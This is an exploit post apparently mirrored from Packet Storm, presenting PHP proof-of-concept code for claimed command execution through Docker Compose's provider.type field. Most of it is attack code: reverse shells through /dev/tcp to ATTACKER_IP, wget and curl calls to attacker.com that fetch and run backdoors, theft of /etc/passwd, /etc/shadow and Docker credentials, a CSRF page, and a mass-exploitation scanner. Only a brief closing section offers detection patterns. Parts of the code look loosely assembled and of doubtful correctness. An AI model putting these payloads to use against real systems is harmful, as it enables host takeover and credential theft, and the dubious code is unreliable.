Share
## https://sploitus.com/exploit?id=PACKETSTORM:212819
=============================================================================================================================================
    | # Title     : Docker Compose v 2.40.3 Provider Type PHP Command Execution                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://docs.docker.com/compose/releases/prior-releases/                                                                    |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212673/ & 
    
    [+] Summary    : Docker Compose Provider Type Command Execution is a critical vulnerability (CVE pending) that allows arbitrary command execution 
                     on the host system when processing Docker Compose files containing the provider.type field. This vulnerability exists due to Docker 
    				 Compose's design to execute any specified provider type as a binary or script on the host without proper validation or isolation.
    
    [+] POC :
    
    1. Creating malicious files via PHP
    
    Example: A PHP page generates malicious Docker Compose files
    
    <?php
    // exploit-docker-compose.php
    if (isset($_GET['cmd'])) {
        $cmd = base64_decode($_GET['cmd']);
        
        // إنشاء محتوى docker-compose.yml
        $composeContent = <<<YAML
    services:
      exploit:
        provider:
          type: /bin/sh
        command: -c "{$cmd}"
    YAML;
        
        // إنشاء محتوى البروفايدر المزيف (لطرق بديلة)
        $scriptContent = "#!/bin/sh\n{$cmd}\n";
        
        header('Content-Type: text/plain');
        echo $composeContent;
        exit;
    }
    
    // أو حفظ الملف على الخادم
    if (isset($_POST['save_exploit'])) {
        $composeContent = <<<YAML
    services:
      backdoor:
        provider:
          type: /tmp/exploit.sh
    YAML;
        
        $scriptContent = "#!/bin/sh\nbash -i >& /dev/tcp/{$_POST['lhost']}/{$_POST['lport']} 0>&1 &\n";
        
        file_put_contents('/tmp/docker-compose.yml', $composeContent);
        file_put_contents('/tmp/exploit.sh', $scriptContent);
        chmod('/tmp/exploit.sh', 0755);
        
        echo "Files created!";
    }
    ?>
    
    Exploiting platforms that allow uploading Docker Compose files
    
    Example: Exploiting a control panel that allows uploading YAML files
    
    <?php
    // file-upload-exploit.php
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['dockerfile'])) {
        $uploadDir = '/var/www/uploads/';
        $composeFile = $uploadDir . basename($_FILES['dockerfile']['name']);
        
        // تحقق بسيط للملف (يمكن تجاوزه)
        if (move_uploaded_file($_FILES['dockerfile']['tmp_name'], $composeFile)) {
            
            // محتوى ضار داخل ملف compose
            $maliciousContent = <<<YAML
    services:
      app:
        image: nginx
        provider:
          type: /bin/sh
        command: -c "wget http://attacker.com/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh"
        
      db:
        image: mysql
        environment:
          MYSQL_ROOT_PASSWORD: $(curl http://attacker.com/steal.php?data=$(cat /etc/passwd|base64))
    YAML;
            
            file_put_contents($composeFile, $maliciousContent);
            
            // محاولة تشغيل docker compose (إذا كانت الصلاحيات تسمح)
            if (isset($_POST['auto_run'])) {
                $output = shell_exec("cd $uploadDir && docker compose up -d 2>&1");
                echo "<pre>Output: $output</pre>";
            }
        }
    }
    ?>
    
    <form method="POST" enctype="multipart/form-data">
        Upload Docker Compose: <input type="file" name="dockerfile">
        <br>
        Auto-run: <input type="checkbox" name="auto_run">
        <br>
        <input type="submit" value="Upload">
    </form>
    
    3. Exploiting API endpoints that interact with Docker
    
    Example: Injecting commands into an API that manages Docker containers
    
    <?php
    // api-exploit.php
    
    // محاكاة endpoint لـ Docker API
    if (isset($_POST['compose_config'])) {
        $config = json_decode($_POST['compose_config'], true);
        
        // نقطة الضعف: عدم التحقق من provider.type
        $yamlContent = yaml_emit($config);
        
        // حفظ الملف المؤقت
        $tempFile = tempnam('/tmp', 'docker_');
        file_put_contents($tempFile, $yamlContent);
        
        // تنفيذ الأمر (مع صلاحيات)
        $output = shell_exec("docker compose -f $tempFile up 2>&1");
        
        // تنظيف (قد لا ينفذ إذا فشل الأمر)
        unlink($tempFile);
        
        echo json_encode(['output' => $output]);
        exit;
    }
    
    // payload للاستغلال
    $payload = [
        'services' => [
            'malicious' => [
                'provider' => [
                    'type' => '/bin/sh'
                ],
                'command' => '-c "echo pwned > /tmp/hacked && cat /etc/shadow | base64 > /tmp/stolen"'
            ]
        ]
    ];
    
    // إرسال الهجوم
    $ch = curl_init('http://target.com/api/docker/deploy');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, [
        'compose_config' => json_encode($payload)
    ]);
    $response = curl_exec($ch);
    curl_close($ch);
    
    echo "Attack sent!";
    ?>
    
    4. CSRF + Docker Compose Exploit
    
    Example: Exploiting CSRF in the Docker Administrator Interface
    
    <?php
    // csrf-exploit.html (يتم رفعه على خادم المهاجم)
    ?>
    <html>
    <body>
    <script>
    // CSRF لاستغلال Docker Compose
    fetch('http://victim.com/docker/deploy', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({
            name: 'innocent-app',
            compose: `services:
      innocent:
        image: nginx
        provider:
          type: /bin/bash
        command: -c "curl http://attacker.com/steal.sh | bash"
        
      backup:
        image: busybox
        command: sh -c "cat /var/lib/docker/config.json | base64 | curl -X POST -d @- http://attacker.com/log"`
        })
    });
    </script>
    <img src="http://victim.com/docker/deploy?action=up&file=http://attacker.com/malicious-compose.yml" onload="alert('Exploited')">
    </body>
    </html>
    
    5. Mass Exploitation Scanner
    
    A scanner for searching for servers vulnerable to the exploit.
    
    <?php
    // docker-scanner.php
    class DockerComposeScanner {
        private $targets = [];
        
        public function addTarget($url) {
            $this->targets[] = $url;
        }
        
        public function scan() {
            foreach ($this->targets as $target) {
                $this->testVulnerability($target);
            }
        }
        
        private function testVulnerability($url) {
            // اختبار 1: رفع ملف مباشر
            $testCompose = tempnam(sys_get_temp_dir(), 'test_');
            $maliciousContent = <<<YAML
    services:
      test:
        provider:
          type: /bin/echo
        command: VULNERABLE
    YAML;
            
            file_put_contents($testCompose, $maliciousContent);
            
            // محاولة رفع إلى الهدف
            $ch = curl_init($url . '/upload');
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, [
                'file' => new CURLFile($testCompose, 'text/yaml', 'docker-compose.yml')
            ]);
            $response = curl_exec($ch);
            
            if (strpos($response, 'VULNERABLE') !== false) {
                $this->log("VULNERABLE: $url");
                $this->exploit($url);
            }
            
            unlink($testCompose);
        }
        
        private function exploit($url) {
            // تنفيذ استغلال كامل
            $reverseShell = base64_encode('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1');
            
            $payload = [
                'compose' => <<<YAML
    services:
      exploit:
        provider:
          type: /bin/bash
        command: -c "echo $reverseShell | base64 -d | bash"
    YAML
            ];
            
            // إرسال Payload
            $ch = curl_init($url . '/api/deploy');
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
            curl_exec($ch);
        }
        
        private function log($message) {
            file_put_contents('scan.log', date('Y-m-d H:i:s') . " - $message\n", FILE_APPEND);
            echo "$message\n";
        }
    }
    
    // الاستخدام
    $scanner = new DockerComposeScanner();
    $scanner->addTarget('http://target1.com');
    $scanner->addTarget('http://target2.com');
    $scanner->scan();
    ?>
    
    6. Webhook Exploitation
    
    Exploiting webhooks that launch Docker Compose
    
    <?php
    // webhook-exploit.php
    // معالجة webhook من GitHub/GitLab/etc
    
    $payload = json_decode(file_get_contents('php://input'), true);
    
    if (isset($payload['ref'])) {
        // محاكاة سكربت النشر
        $repoUrl = $payload['repository']['clone_url'];
        
        // استنساخ المستودع (قد يحتوي على ملفات ضارة)
        $cloneDir = '/tmp/repo_' . uniqid();
        shell_exec("git clone $repoUrl $cloneDir");
        
        // تشغيل docker compose إذا وجد
        if (file_exists("$cloneDir/docker-compose.yml")) {
            // تنفيذ الأمر الضار
            shell_exec("cd $cloneDir && docker compose up -d");
            
            // تنظيف (قد يفشل إذا كان هناك عملية خلفية)
            shell_exec("rm -rf $cloneDir");
        }
        
        // أو حقن ملف ضار
        $injectedCompose = <<<YAML
    services:
      web:
        image: nginx
        provider:
          type: /bin/sh
        command: -c "curl http://attacker.com/c2.php?host=$(hostname) | bash"
    YAML;
        
        file_put_contents("$cloneDir/docker-compose.yml", $injectedCompose);
        shell_exec("cd $cloneDir && docker compose up");
    }
    ?>
    
    Attack detection
    PHP detection system:
    
    <?php
    // intrusion-detection.php
    class DockerIntrusionDetection {
        public static function monitor() {
            $logs = [
                '/var/log/docker.log',
                '/var/log/syslog',
                '/var/log/auth.log'
            ];
            
            $patterns = [
                '/provider\.type.*(\/bin\/|\/tmp\/|\/dev\/)/',
                '/docker compose.*(curl|wget|bash|sh).*(attacker|exploit)/i',
                '/execution.*(compose|docker).*(provider|type)/i'
            ];
            
            foreach ($logs as $log) {
                if (file_exists($log)) {
                    $content = file_get_contents($log);
                    foreach ($patterns as $pattern) {
                        if (preg_match($pattern, $content)) {
                            self::alert($pattern, $log);
                        }
                    }
                }
            }
        }
        
        private static function alert($pattern, $log) {
            $message = "DOCKER EXPLOIT DETECTED!\n";
            $message .= "Pattern: $pattern\n";
            $message .= "Log file: $log\n";
            $message .= "Time: " . date('Y-m-d H:i:s') . "\n";
            
            // إرسال تنبيه
            mail('admin@example.com', 'Security Alert - Docker Exploit', $message);
            syslog(LOG_ALERT, $message);
        }
    }
    
    // تشغيل المراقبة
    DockerIntrusionDetection::monitor();
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================